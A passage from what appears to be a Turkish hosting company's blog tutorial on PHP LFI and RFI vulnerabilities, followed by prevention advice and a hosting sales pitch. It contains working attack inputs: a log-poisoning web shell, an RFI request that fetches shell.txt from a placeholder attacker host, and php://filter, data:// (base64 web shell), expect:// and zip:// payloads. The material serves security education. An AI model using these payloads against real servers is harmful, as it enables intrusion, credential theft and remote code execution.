ad\u0131md\u0131r.<\/p>\n<h4>Windows Sistemlerde `C:\\boot.ini` Dosyas\u0131n\u0131 Okuma<\/h4>\n<p>Windows sistemlerde ise `C:\\boot.ini` gibi dosyalar hedeflenebilir. Bu dosya, sistemin ba\u015flang\u0131\u00e7 (boot) ayarlar\u0131 hakk\u0131nda bilgi i\u00e7erir ve i\u015fletim sistemi s\u00fcr\u00fcm\u00fc gibi detaylar\u0131 ortaya \u00e7\u0131karabilir. Bu bilgiler, sisteme y\u00f6nelik daha spesifik zafiyetlerin aranmas\u0131 i\u00e7in kullan\u0131labilir.<\/p>\n<h4>Uygulama Konfig\u00fcrasyon Dosyalar\u0131na Eri\u015fim<\/h4>\n<p>Belki de en tehlikeli senaryolardan biri, sald\u0131rgan\u0131n web uygulamas\u0131n\u0131n kendi konfig\u00fcrasyon dosyalar\u0131na eri\u015fmesidir. \u00d6rne\u011fin, `config.php` veya `.env` gibi dosyalar genellikle veritaban\u0131 ba\u011flant\u0131 bilgilerini (kullan\u0131c\u0131 ad\u0131, \u015fifre, sunucu adresi) i\u00e7erir. Bu bilgilere eri\u015fen bir sald\u0131rgan, uygulaman\u0131n t\u00fcm veritaban\u0131n\u0131 ele ge\u00e7irebilir.<\/p>\n<h4>Log Dosyalar\u0131 \u00dczerinden Kod \u00c7al\u0131\u015ft\u0131rma (Log Poisoning)<\/h4>\n<p>LFI zafiyeti, basit bir bilgi s\u0131zd\u0131rma a\u00e7\u0131\u011f\u0131ndan uzaktan kod \u00e7al\u0131\u015ft\u0131rma (RCE) zafiyetine d\u00f6n\u00fc\u015ft\u00fcr\u00fclebilir. Bunun bir yolu &#8220;log zehirleme&#8221; (log poisoning) tekni\u011fidir. Sald\u0131rgan, web sunucusunun (\u00f6rne\u011fin Apache) eri\u015fim loglar\u0131na kas\u0131tl\u0131 olarak PHP kodu i\u00e7eren bir istek g\u00f6nderir. \u00d6rne\u011fin, User-Agent ba\u015fl\u0131\u011f\u0131na veya URL&#8217;nin kendisine `<?php system($_GET['cmd']); ?>` gibi bir kod enjekte eder. Sunucu bu hatal\u0131 iste\u011fi log dosyas\u0131na (`\/var\/log\/apache2\/access.log` gibi) yazar. Daha sonra sald\u0131rgan, LFI zafiyetini kullanarak bu log dosyas\u0131n\u0131 `include` ettirir. Log dosyas\u0131 PHP yorumlay\u0131c\u0131s\u0131 taraf\u0131ndan i\u015flenece\u011fi i\u00e7in, i\u00e7ine enjekte edilen kod \u00e7al\u0131\u015f\u0131r ve sald\u0131rgan `cmd` parametresi \u00fczerinden sunucuda komut \u00e7al\u0131\u015ft\u0131rabilir hale gelir.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Uzak-Dosya-Ekleme-RFI-%E2%80%93-Remote-File-Inclusion-Zafiyeti\"><\/span>Uzak Dosya Ekleme (RFI &#8211; Remote File Inclusion) Zafiyeti<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>RFI, LFI&#8217;ye g\u00f6re genellikle daha y\u0131k\u0131c\u0131 etkilere sahip bir zafiyettir \u00e7\u00fcnk\u00fc sald\u0131rgan\u0131n hedef sunucuya tamamen yabanc\u0131 ve kendi kontrol\u00fcndeki bir kaynaktan kod enjekte etmesine olanak tan\u0131r. Bu durum, neredeyse her zaman sunucunun tamamen ele ge\u00e7irilmesiyle sonu\u00e7lan\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"RFI-Zafiyeti-Nedir\"><\/span>RFI Zafiyeti Nedir?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Uzak Dosya Ekleme (RFI), bir web uygulamas\u0131n\u0131n, kullan\u0131c\u0131dan ald\u0131\u011f\u0131 bir URL&#8217;yi do\u011frulamadan dosya ekleme fonksiyonlar\u0131na dahil etmesiyle ortaya \u00e7\u0131kar. Sald\u0131rgan, bu zafiyeti kullanarak kendi sunucusunda bar\u0131nd\u0131rd\u0131\u011f\u0131 zararl\u0131 bir beti\u011fi (\u00f6rne\u011fin bir web shell) hedef sunucuya `include` ettirir. Hedef sunucunun PHP yorumlay\u0131c\u0131s\u0131, bu uzak dosyay\u0131 sanki yerel bir dosyym\u0131\u015f gibi \u00e7al\u0131\u015ft\u0131r\u0131r. Bu, sald\u0131rgana hedef <a href=\"https:\/\/www.ihs.com.tr\/sunucu-kiralama\/\" target=\"_blank\">sunucu<\/a> \u00fczerinde komut \u00e7al\u0131\u015ft\u0131rma, dosya okuma\/yazma ve sistemde tam kontrol sa\u011flama gibi \u00e7ok geni\u015f yetkiler verir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"RFI-Zafiyetinin-Ortaya-Cikma-Kosullari-phpini-Yapilandirmasi\"><\/span>RFI Zafiyetinin Ortaya \u00c7\u0131kma Ko\u015fullar\u0131: `php.ini` Yap\u0131land\u0131rmas\u0131<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>RFI sald\u0131r\u0131s\u0131n\u0131n ba\u015far\u0131l\u0131 olabilmesi i\u00e7in, LFI&#8217;den farkl\u0131 olarak, hedef sunucudaki PHP yap\u0131land\u0131rmas\u0131n\u0131n belirli bir \u015fekilde ayarlanm\u0131\u015f olmas\u0131 gerekir. Bu ayarlar `php.ini` dosyas\u0131nda bulunur.<\/p>\n<h4>`allow_url_fopen` Direktifi<\/h4>\n<p>Bu direktif, PHP&#8217;nin dosya fonksiyonlar\u0131n\u0131n (\u00f6rne\u011fin `fopen()`, `file_get_contents()`) URL&#8217;leri bir dosya gibi a\u00e7\u0131p a\u00e7amayaca\u011f\u0131n\u0131 kontrol eder. RFI&#8217;nin \u00e7al\u0131\u015fabilmesi i\u00e7in bu ayar\u0131n `On` (a\u00e7\u0131k) olmas\u0131 bir \u00f6n ko\u015fuldur, \u00e7\u00fcnk\u00fc PHP&#8217;nin uzak sunucudaki dosyaya eri\u015febilmesi gerekir. \u00c7o\u011fu modern <a href=\"https:\/\/www.ihs.com.tr\/web-hosting\/\" target=\"_blank\">hosting<\/a> yap\u0131land\u0131rmas\u0131nda bu ayar varsay\u0131lan olarak a\u00e7\u0131kt\u0131r.<\/p>\n<h4>`allow_url_include` Direktifi<\/h4>\n<p>Bu, RFI i\u00e7in en kritik ayard\u0131r. Bu direktif, `include`, `require` gibi fonksiyonlar\u0131n uzak URL&#8217;lerden dosya eklemesine izin verip vermeyece\u011fini belirler. G\u00fcvenlik nedeniyle, PHP&#8217;nin modern s\u00fcr\u00fcmlerinde bu ayar varsay\u0131lan olarak `Off` (kapal\u0131) konumdad\u0131r. Bir RFI sald\u0131r\u0131s\u0131n\u0131n ger\u00e7ekle\u015febilmesi i\u00e7in bu direktifin `On` olarak ayarlanm\u0131\u015f olmas\u0131 zorunludur. Eski veya yanl\u0131\u015f yap\u0131land\u0131r\u0131lm\u0131\u015f sunucularda bu ayar a\u00e7\u0131k b\u0131rak\u0131lm\u0131\u015f olabilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"RFI-Saldirisi-Nasil-Gerceklestirilir\"><\/span>RFI Sald\u0131r\u0131s\u0131 Nas\u0131l Ger\u00e7ekle\u015ftirilir?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Zafiyetli bir kod par\u00e7as\u0131 d\u00fc\u015f\u00fcnelim: `include($_GET[&#8216;dosya&#8217;]);`. Sald\u0131rgan, kendi kontrol\u00fcndeki `http:\/\/kotu-niyetli-site.com\/shell.txt` adresinde `<?php phpinfo(); ?>` gibi basit bir PHP kodu bar\u0131nd\u0131rd\u0131\u011f\u0131n\u0131 varsayal\u0131m. Sald\u0131rgan, hedef siteye \u015fu \u015fekilde bir istek g\u00f6nderir:<\/p>\n<p><code>http:\/\/hedefsite.com\/index.php?dosya=http:\/\/kotu-niyetli-site.com\/shell.txt<\/code><\/p>\n<p>E\u011fer `allow_url_include` a\u00e7\u0131ksa, hedef sunucu `kotu-niyetli-site.com` adresine ba\u011flanacak, `shell.txt` dosyas\u0131n\u0131 indirecek ve i\u00e7eri\u011fini PHP kodu olarak \u00e7al\u0131\u015ft\u0131racakt\u0131r. Sonu\u00e7 olarak, hedef sunucunun PHP bilgileri sald\u0131rgan\u0131n ekran\u0131nda g\u00f6r\u00fcnecektir. Sald\u0131rgan, `phpinfo()` yerine karma\u015f\u0131k bir web shell y\u00fckleyerek sunucu \u00fczerinde tam kontrol sa\u011flayabilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"RFInin-Yikici-Etkileri-Uzaktan-Kod-Calistirma-RCE-Riski\"><\/span>RFI&#8217;nin Y\u0131k\u0131c\u0131 Etkileri: Uzaktan Kod \u00c7al\u0131\u015ft\u0131rma (RCE) Riski<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>RFI zafiyetinin varl\u0131\u011f\u0131, neredeyse her zaman do\u011frudan Uzaktan Kod \u00c7al\u0131\u015ft\u0131rma (Remote Code Execution &#8211; RCE) anlam\u0131na gelir. RCE, bir sald\u0131rgan\u0131n hedef sistem \u00fczerinde keyfi i\u015fletim sistemi komutlar\u0131 \u00e7al\u0131\u015ft\u0131rabilmesi durumudur. Bu, en y\u00fcksek riskli zafiyetlerden biridir. RCE yetkisi kazanan bir sald\u0131rgan \u015funlar\u0131 yapabilir:<\/p>\n<ul>\n<li>Sunucudaki t\u00fcm dosyalar\u0131 okuyabilir, de\u011fi\u015ftirebilir veya silebilir.<\/li>\n<li>Veritabanlar\u0131na eri\u015febilir ve verileri \u00e7alabilir veya yok edebilir.<\/li>\n<li>Sunucuya arka kap\u0131 (backdoor) veya fidye yaz\u0131l\u0131m\u0131 (ransomware) gibi zararl\u0131 yaz\u0131l\u0131mlar y\u00fckleyebilir.<\/li>\n<li>Sunucuyu, di\u011fer sistemlere y\u00f6nelik sald\u0131r\u0131lar (DDoS, spam g\u00f6nderimi vb.) i\u00e7in bir s\u0131\u00e7rama tahtas\u0131 olarak kullanabilir.<\/li>\n<li>A\u011fdaki di\u011fer sunuculara s\u0131zmaya \u00e7al\u0131\u015fabilir.<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"PHP-Wrapperlari-Kullanarak-Gelismis-Dosya-Okuma-ve-Kod-Calistirma-Teknikleri\"><\/span>PHP Wrapper&#8217;lar\u0131 Kullanarak Geli\u015fmi\u015f Dosya Okuma ve Kod \u00c7al\u0131\u015ft\u0131rma Teknikleri<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Sald\u0131rganlar, dosya ekleme zafiyetlerini s\u00f6m\u00fcr\u00fcrken basit dosya yollar\u0131n\u0131n \u00f6tesine ge\u00e7erek PHP&#8217;nin &#8220;wrapper&#8221; ad\u0131 verilen yerle\u015fik protokollerini k\u00f6t\u00fcye kullanabilirler. Bu wrapper&#8217;lar, dosya benzeri kaynaklara eri\u015fim i\u00e7in alternatif yollar sunar ve sald\u0131rganlara filtreleri atlatma, kaynak kodunu g\u00f6r\u00fcnt\u00fcleme ve hatta do\u011frudan kod enjekte etme gibi geli\u015fmi\u015f yetenekler kazand\u0131r\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"PHP-Wrapper-Nedir-ve-Saldirilarda-Nasil-Kotuye-Kullanilir\"><\/span>PHP Wrapper Nedir ve Sald\u0131r\u0131larda Nas\u0131l K\u00f6t\u00fcye Kullan\u0131l\u0131r?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>PHP stream wrapper&#8217;lar\u0131, `http:\/\/`, `ftp:\/\/` gibi bilinen protokollerin yan\u0131 s\u0131ra `php:\/\/`, `data:\/\/`, `expect:\/\/` gibi \u00f6zel ak\u0131\u015flara eri\u015fim sa\u011flayan bir aray\u00fczd\u00fcr. Normalde dosya y\u00f6netimi ve veri ak\u0131\u015f\u0131 i\u00e7in tasarlanm\u0131\u015f olsalar da, bir LFI\/RFI zafiyeti ba\u011flam\u0131nda g\u00fc\u00e7l\u00fc birer sald\u0131r\u0131 arac\u0131na d\u00f6n\u00fc\u015febilirler. Sald\u0131rgan, dosya ad\u0131 yerine bu wrapper&#8217;lar\u0131 kullanarak uygulaman\u0131n dosya ekleme mant\u0131\u011f\u0131n\u0131 farkl\u0131 \u015fekillerde manip\u00fcle edebilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"php-filter-Wrapperi-ile-Dosya-Kaynak-Kodunu-Goruntuleme\"><\/span>`php:\/\/filter` Wrapper&#8217;\u0131 ile Dosya Kaynak Kodunu G\u00f6r\u00fcnt\u00fcleme<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Belki de en s\u0131k kullan\u0131lan wrapper&#8217;lardan biri `php:\/\/filter`&#8217;d\u0131r. Bu wrapper, bir dosya okunmadan \u00f6nce ona \u00e7e\u015fitli filtreler uygulama imkan\u0131 tan\u0131r. Sald\u0131rganlar i\u00e7in en kullan\u0131\u015fl\u0131 \u00f6zellik, dosyalar\u0131 `base64` gibi formatlarda kodlayarak okuma yetene\u011fidir. Bu teknik, sunucunun `.php` dosyalar\u0131n\u0131 do\u011frudan \u00e7al\u0131\u015ft\u0131rmas\u0131n\u0131 engellemek ve bunun yerine kaynak kodunu elde etmek i\u00e7in kullan\u0131l\u0131r.<\/p>\n<p>\u00d6rnek sald\u0131r\u0131: `index.php?sayfa=php:\/\/filter\/convert.base64-encode\/resource=config.php`<\/p>\n<p>Bu istek, `config.php` dosyas\u0131n\u0131n i\u00e7eri\u011fini `base64` format\u0131nda kodlayarak ekrana basar. Sunucu, dosyan\u0131n i\u00e7eri\u011fini PHP kodu olarak \u00e7al\u0131\u015ft\u0131rmak yerine, kodlanm\u0131\u015f metni bir \u00e7\u0131kt\u0131 olarak d\u00f6nd\u00fcr\u00fcr. Sald\u0131rgan daha sonra bu metni kendi taraf\u0131nda \u00e7\u00f6zerek veritaban\u0131 \u015fifreleri gibi hassas bilgileri i\u00e7eren kaynak kodunu okuyabilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"data-Wrapperi-ile-Kod-Enjeksiyonu\"><\/span>`data:\/\/` Wrapper&#8217;\u0131 ile Kod Enjeksiyonu<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>E\u011fer sunucuda `allow_url_include` ayar\u0131 a\u00e7\u0131ksa, `data:\/\/` wrapper&#8217;\u0131 RFI i\u00e7in harici bir sunucuya ihtiya\u00e7 duymadan do\u011frudan kod enjekte etme imkan\u0131 sunar. Bu wrapper, veriyi do\u011frudan URL&#8217;nin kendisinde ta\u015f\u0131man\u0131za olanak tan\u0131r.<\/p>\n<p>\u00d6rnek sald\u0131r\u0131: `index.php?sayfa=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`<\/p>\n<p>Burada `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+` ifadesi, `<?php system($_GET['cmd']); ?>` kodunun base64 ile kodlanm\u0131\u015f halidir. PHP, bu veriyi bir dosya gibi i\u015fler, base64&#8217;\u00fc \u00e7\u00f6zer ve ortaya \u00e7\u0131kan PHP kodunu \u00e7al\u0131\u015ft\u0131r\u0131r. Bu, harici bir ba\u011flant\u0131ya gerek kalmadan RCE elde etmenin etkili bir yoludur.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"expect-Wrapperi-ile-Komut-Calistirma\"><\/span>`expect:\/\/` Wrapper&#8217;\u0131 ile Komut \u00c7al\u0131\u015ft\u0131rma<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>`expect:\/\/` wrapper&#8217;\u0131, interaktif ak\u0131\u015flar\u0131 i\u015flemek i\u00e7in tasarlanm\u0131\u015ft\u0131r ve `expect` eklentisinin sunucuda y\u00fckl\u00fc olmas\u0131n\u0131 gerektirir. E\u011fer y\u00fckl\u00fcyse, LFI zafiyeti arac\u0131l\u0131\u011f\u0131yla do\u011frudan i\u015fletim sistemi komutlar\u0131 \u00e7al\u0131\u015ft\u0131rmak i\u00e7in kullan\u0131labilir.<\/p>\n<p>\u00d6rnek sald\u0131r\u0131: `index.php?sayfa=expect:\/\/ls`<\/p>\n<p>Bu istek, sunucuda `ls` komutunu \u00e7al\u0131\u015ft\u0131r\u0131r ve \u00e7\u0131kt\u0131s\u0131n\u0131 web sayfas\u0131 \u00fczerinde g\u00f6sterir. Bu, `expect` eklentisinin nadiren aktif olmas\u0131 nedeniyle daha az yayg\u0131n bir tekniktir ancak olduk\u00e7a tehlikelidir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"zip-ve-phar-Wrapperlari-ile-Arsivlenmis-Dosyalara-Erisim\"><\/span>`zip:\/\/` ve `phar:\/\/` Wrapper&#8217;lar\u0131 ile Ar\u015fivlenmi\u015f Dosyalara Eri\u015fim<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>`zip:\/\/` ve `phar:\/\/` wrapper&#8217;lar\u0131, sald\u0131rganlar\u0131n sunucuya y\u00fcklenmi\u015f ar\u015fiv dosyalar\u0131n\u0131n (ZIP, PHAR vb.) i\u00e7eri\u011fine eri\u015fmesini sa\u011flar. E\u011fer bir sald\u0131rgan sunucuya bir \u015fekilde `.zip` uzant\u0131l\u0131 bir dosya y\u00fckleyebilirse (\u00f6rne\u011fin, bir profil resmi y\u00fckleme fonksiyonu arac\u0131l\u0131\u011f\u0131yla), bu wrapper&#8217;\u0131 kullanarak ar\u015fiv i\u00e7indeki zararl\u0131 bir beti\u011fi \u00e7al\u0131\u015ft\u0131rabilir.<\/p>\n<p>\u00d6rnek sald\u0131r\u0131: `index.php?sayfa=zip:\/\/uploads\/arsiv.zip%23shell.php`<\/p>\n<p>Bu istek, `uploads` klas\u00f6r\u00fcndeki `arsiv.zip` dosyas\u0131n\u0131 a\u00e7ar ve i\u00e7indeki `shell.php` dosyas\u0131n\u0131 `include` etmeye \u00e7al\u0131\u015f\u0131r. Bu, dosya y\u00fckleme k\u0131s\u0131tlamalar\u0131n\u0131 (\u00f6rne\u011fin sadece resim dosyalar\u0131na izin verilmesi) atlatmak i\u00e7in kullan\u0131labilir.<\/p>\n<div class=\"karsilastirma\">\n<table>\n<thead>\n<tr>\n<th>PHP Wrapper<\/th>\n<th>Temel \u0130\u015flevi<\/th>\n<th>Sald\u0131r\u0131 Senaryosu<\/th>\n<th>Gereken Ko\u015ful<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><b>`php:\/\/filter`<\/b><\/td>\n<td>Dosya okunurken filtreleme\/kodlama uygulama<\/td>\n<td>`.php` dosyalar\u0131n\u0131n kaynak kodunu base64 ile kodlayarak okuma<\/td>\n<td>LFI zafiyeti olmas\u0131 yeterlidir.<\/td>\n<\/tr>\n<tr>\n<td><b>`data:\/\/`<\/b><\/td>\n<td>Veriyi do\u011frudan URL i\u00e7inde ta\u015f\u0131ma<\/td>\n<td>Harici sunucuya ihtiya\u00e7 duymadan RCE i\u00e7in kod enjekte etme<\/td>\n<td>`allow_url_include = On`<\/td>\n<\/tr>\n<tr>\n<td><b>`expect:\/\/`<\/b><\/td>\n<td>\u0130nteraktif ak\u0131\u015flar \u00fczerinden komut \u00e7al\u0131\u015ft\u0131rma<\/td>\n<td>LFI \u00fczerinden do\u011frudan OS komutu \u00e7al\u0131\u015ft\u0131rma<\/td>\n<td>`expect` eklentisinin y\u00fckl\u00fc olmas\u0131<\/td>\n<\/tr>\n<tr>\n<td><b>`zip:\/\/`<\/b><\/td>\n<td>ZIP ar\u015fivlerinin i\u00e7eri\u011fine eri\u015fim<\/td>\n<td>Y\u00fcklenmi\u015f bir ar\u015fiv i\u00e7indeki zararl\u0131 dosyay\u0131 \u00e7al\u0131\u015ft\u0131rma<\/td>\n<td>Sunucuda ZIP ar\u015fivinin bulunmas\u0131<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<h2><span class=\"ez-toc-section\" id=\"Dosya-Ekleme-Zafiyetlerini-Tespit-Etme-ve-Onleme-Yontemleri\"><\/span>Dosya Ekleme Zafiyetlerini Tespit Etme ve \u00d6nleme Y\u00f6ntemleri<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Dosya ekleme zafiyetleri son derece tehlikeli olabildi\u011finden, bu t\u00fcr a\u00e7\u0131kl\u0131klar\u0131 hem geli\u015ftirme a\u015famas\u0131nda hem de sonras\u0131nda proaktif olarak tespit etmek ve \u00f6nlemek kritik \u00f6neme sahiptir. G\u00fcvenli bir web uygulamas\u0131 i\u00e7in manuel kod analizi, otomatik tarama ara\u00e7lar\u0131, g\u00fcvenli kodlama pratikleri ve do\u011fru sunucu yap\u0131land\u0131rmas\u0131 bir arada kullan\u0131lmal\u0131d\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Manuel-Kod-Analizi-ile-Zafiyet-Tespiti\"><\/span>Manuel Kod Analizi ile Zafiyet Tespiti<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Zafiyet tespitinin en temel ve etkili yollar\u0131ndan biri, uygulaman\u0131n kaynak kodunu manuel olarak incelemektir. Geli\u015ftiriciler ve g\u00fcvenlik analistleri, \u00f6zellikle kullan\u0131c\u0131dan gelen verilerin i\u015flendi\u011fi noktalara odaklanmal\u0131d\u0131r. Kod i\u00e7erisinde `include`, `require`, `include_once`, `require_once`, `fopen`, `file_get_contents` gibi dosya i\u015flemleri yapan fonksiyonlar\u0131n kullan\u0131ld\u0131\u011f\u0131 yerler dikkatle incelenmelidir. E\u011fer bu fonksiyonlara parametre olarak `$_GET`, `$_POST`, `$_COOKIE` gibi s\u00fcper global dizilerden gelen ve temizlenmemi\u015f veriler aktar\u0131l\u0131yorsa, bu potansiyel bir zafiyete i\u015farettir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Otomatik-Zafiyet-Tarama-Araclarinin-Kullanimi\"><\/span>Otomatik Zafiyet Tarama Ara\u00e7lar\u0131n\u0131n Kullan\u0131m\u0131<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>B\u00fcy\u00fck ve karma\u015f\u0131k uygulamalarda her kod sat\u0131r\u0131n\u0131 manuel olarak incelemek zor olabilir. Bu noktada, otomatik zafiyet tarama ara\u00e7lar\u0131 (Dynamic Application Security Testing &#8211; DAST veya Static Application Security Testing &#8211; SAST) devreye girer. Bu ara\u00e7lar, uygulamay\u0131 bir sald\u0131rgan\u0131n bak\u0131\u015f a\u00e7\u0131s\u0131yla test ederek veya kaynak kodunu statik olarak analiz ederek potansiyel LFI\/RFI a\u00e7\u0131klar\u0131n\u0131 ve di\u011fer g\u00fcvenlik zafiyetlerini tespit etmeye \u00e7al\u0131\u015f\u0131r. Ara\u00e7lar, bilinen sald\u0131r\u0131 vekt\u00f6rlerini (\u00f6rne\u011fin `..\/` enjeksiyonu) otomatik olarak deneyerek zafiyetleri ortaya \u00e7\u0131karabilir.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Guvenli-Kodlama-Prensipleri-ve-En-Iyi-Uygulamalar\"><\/span>G\u00fcvenli Kodlama Prensipleri ve En \u0130yi Uygulamalar<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Zafiyetleri sonradan bulup d\u00fczeltmek yerine, en ba\u015f\u0131ndan g\u00fcvenli kod yazma al\u0131\u015fkanl\u0131\u011f\u0131 edinmek en do\u011fru yakla\u015f\u0131md\u0131r. Dosya ekleme zafiyetlerini \u00f6nlemek i\u00e7in a\u015fa\u011f\u0131daki prensipler hayati \u00f6nem ta\u015f\u0131r.<\/p>\n<h4>Kullan\u0131c\u0131 Girdilerini Do\u011frulama ve Temizleme (Input Validation &#038; Sanitization)<\/h4>\n<p>Kullan\u0131c\u0131dan gelen hi\u00e7bir veriye g\u00fcvenilmemelidir. Dosya ad\u0131 olarak kullan\u0131lacak girdiler, beklenen formatta olup olmad\u0131\u011f\u0131na dair s\u0131k\u0131 bir \u015fekilde do\u011frulanmal\u0131d\u0131r. \u00d6rne\u011fin, sadece harf ve rakam i\u00e7ermesi gereken bir girdi `.` veya `\/` gibi \u00f6zel karakterler i\u00e7eriyorsa reddedilmelidir. Temizleme (sanitization) i\u015flemi ise, girdideki potansiyel zararl\u0131 karakterleri (\u00f6rne\u011fin `..\/`) kald\u0131rarak veriyi zarars\u0131z hale getirmeyi ama\u00e7lar.<\/p>\n<h4>Beyaz Liste (Whitelist) Yakla\u015f\u0131m\u0131 Kullan\u0131m\u0131<\/h4>\n<p>Kara liste (blacklist) yakla\u015f\u0131m\u0131, bilinen tehlikeli girdileri (`..\/`, `http:\/\/` vb.) engellemeye \u00e7al\u0131\u015f\u0131r ancak sald\u0131rganlar bu filtreleri atlatmak i\u00e7in s\u00fcrekli yeni yollar bulur. Bunun yerine, \u00e7ok daha g\u00fcvenli olan beyaz liste (whitelist) yakla\u015f\u0131m\u0131 benimsenmelidir. Bu yakla\u015f\u0131mda, sadece izin verilen, \u00f6nceden tan\u0131mlanm\u0131\u015f bir dizi de\u011fer kabul edilir. \u00d6rne\u011fin, dahil edilebilecek dosyalar\u0131n bir listesi olu\u015fturulur ve kullan\u0131c\u0131dan gelen girdi bu listede yer alm\u0131yorsa i\u015flem reddedilir.<\/p>\n<p><code>&lt;?php<br \/>$izinli_sayfalar = ['anasayfa', 'hakkimizda', 'iletisim'];<br \/>$istenen_sayfa = $_GET['sayfa'];<\/p>\n<p>if (in_array($istenen_sayfa, $izinli_sayfalar)) {<br \/> include($istenen_sayfa . '.php');<br \/>} else {<br \/> include('hata.php');<br \/>}<br \/>?&gt;<\/code><\/p>\n<p>Bu kod, sadece `$izinli_sayfalar` dizisinde bulunan de\u011ferlerin `include` edilmesine izin vererek LFI\/RFI riskini tamamen ortadan kald\u0131r\u0131r.<\/p>\n<h4>G\u00fcvenli Dosya Yolu Y\u00f6netimi<\/h4>\n<p>Kullan\u0131c\u0131 girdisini do\u011frudan dosya yolu olarak kullanmaktan ka\u00e7\u0131n\u0131n. Bunun yerine, sabit bir dizin yolu tan\u0131mlay\u0131n ve kullan\u0131c\u0131dan gelen girdiyi bu yola ekleyerek tam dosya yolunu olu\u015fturun. `basename()` fonksiyonu, bir dosya yolundan sadece dosya ad\u0131n\u0131 alarak `..\/` gibi dizin ge\u00e7i\u015fi karakterlerini temizler ve ek bir g\u00fcvenlik katman\u0131 sa\u011flar.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Sunucu-ve-PHP-Yapilandirmasini-Guvenlilestirme\"><\/span>Sunucu ve PHP Yap\u0131land\u0131rmas\u0131n\u0131 G\u00fcvenlile\u015ftirme<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Uygulama kodunun g\u00fcvenli\u011fi kadar, \u00fczerinde \u00e7al\u0131\u015ft\u0131\u011f\u0131 sunucunun yap\u0131land\u0131rmas\u0131 da \u00f6nemlidir. \u00d6zellikle RFI riskini ortadan kald\u0131rmak i\u00e7in `php.ini` dosyas\u0131nda a\u015fa\u011f\u0131daki ayarlar\u0131n yap\u0131ld\u0131\u011f\u0131ndan emin olunmal\u0131d\u0131r:<\/p>\n<ul>\n<li><b>`allow_url_include = Off`<\/b>: Bu ayar, `include` ve `require` fonksiyonlar\u0131n\u0131n uzak URL&#8217;leri a\u00e7mas\u0131n\u0131 engeller. Bu, RFI zafiyetini \u00f6nlemek i\u00e7in en kritik ayard\u0131r ve mutlaka kapal\u0131 olmal\u0131d\u0131r.<\/li>\n<li><b>`allow_url_fopen = Off`<\/b>: E\u011fer uygulaman\u0131z\u0131n harici URL&#8217;lerden dosya okumas\u0131na gerek yoksa, bu ayar\u0131 da kapatmak ek bir g\u00fcvenlik katman\u0131 sa\u011flar.<\/li>\n<\/ul>\n<p>Ayr\u0131ca, PHP&#8217;nin `open_basedir` direktifi kullan\u0131larak betiklerin eri\u015febilece\u011fi dosya sistemi yollar\u0131 k\u0131s\u0131tlanabilir. Bu, bir LFI zafiyeti olsa bile sald\u0131rgan\u0131n sadece belirlenen dizinler i\u00e7inde gezinmesine izin vererek zarar\u0131n kapsam\u0131n\u0131 s\u0131n\u0131rlar. G\u00fcvenlik i\u00e7in bir <a href=\"https:\/\/www.ihs.com.tr\/ssl\/\" target=\"_blank\">SSL sertifikas\u0131<\/a> kullanmak da veri iletimini \u015fifreleyerek genel g\u00fcvenli\u011fi art\u0131r\u0131r.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Web-Uygulama-Guvenliginiz-Icin-Neden-IHS-Telekomu-Tercih-Etmelisiniz\"><\/span>Web Uygulama G\u00fcvenli\u011finiz \u0130\u00e7in Neden \u0130HS Telekom&#8217;u Tercih Etmelisiniz?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Web uygulama g\u00fcvenli\u011fi, sadece kod yazmaktan ibaret de\u011fildir; ayn\u0131 zamanda uygulaman\u0131n bar\u0131nd\u0131r\u0131ld\u0131\u011f\u0131 altyap\u0131n\u0131n g\u00fcvenli\u011fine, proaktif koruma mekanizmalar\u0131na ve olas\u0131 bir sald\u0131r\u0131 durumunda al\u0131nacak h\u0131zl\u0131 aksiyonlara da ba\u011fl\u0131d\u0131r. \u0130HS Telekom, bu b\u00fct\u00fcnc\u00fcl g\u00fcvenlik yakla\u015f\u0131m\u0131n\u0131 benimseyerek web varl\u0131klar\u0131n\u0131z\u0131 LFI, RFI gibi kritik zafiyetlere kar\u015f\u0131 korumak i\u00e7in kapsaml\u0131 \u00e7\u00f6z\u00fcmler sunar. Bir <a href=\"https:\/\/www.ihs.com.tr\/domain\/alan-adi-domain-tescili.html\" target=\"_blank\">alan ad\u0131<\/a> kaydettikten sonra projenizi g\u00fcvenli bir altyap\u0131da bar\u0131nd\u0131rmak, ba\u015far\u0131n\u0131n ilk ad\u0131m\u0131d\u0131r.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Guvenli-Barindirma-Altyapisi-ve-Zafiyet-Korumasi\"><\/span>G\u00fcvenli 